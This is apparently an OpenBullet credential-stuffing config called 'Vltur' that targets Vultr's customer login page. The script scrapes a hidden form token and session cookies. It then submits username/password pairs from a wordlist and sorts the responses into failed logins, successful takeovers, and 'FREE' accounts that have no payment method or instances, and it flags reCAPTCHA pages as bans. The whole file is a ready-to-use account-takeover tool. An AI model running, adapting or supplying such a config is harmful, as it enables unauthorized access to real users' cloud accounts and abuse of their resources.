[SETTINGS]
{
  "Name": "Vltur",
  "SuggestedBots": 1,
  "LastModified": "2019-04-14T21:07:26.8684902-05:00",
  "AdditionalInfo": "",
  "Author": "FFaez1267",
  "Version": "1.0.1",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://my.vultr.com/" 
  
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 

PARSE "<SOURCE>" LR "input type=\"hidden\" name=\"action\" value=\"" "\">" -> VAR "TOKEN" 

PARSE "<COOKIES(__cfduid)>" LR "" "" -> VAR "__cfduid" 

PARSE "<COOKIES(PHPSESSID)>" LR "" "" -> VAR "PHPSESSID" 

REQUEST POST "https://my.vultr.com/" 
  CONTENT "action=<TOKEN>&login_type=normal&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid username/password" 
    KEY "is closed." 
  KEYCHAIN Success OR 
    KEY "Welcome back" 
  KEYCHAIN Custom "FREE" OR 
    KEY "No active instances " 
    KEY "You are almost ready to deploy servers - please link a payment method to get started!" 
  KEYCHAIN Ban OR 
    KEY "div class=\"g-recaptcha\" data-" 

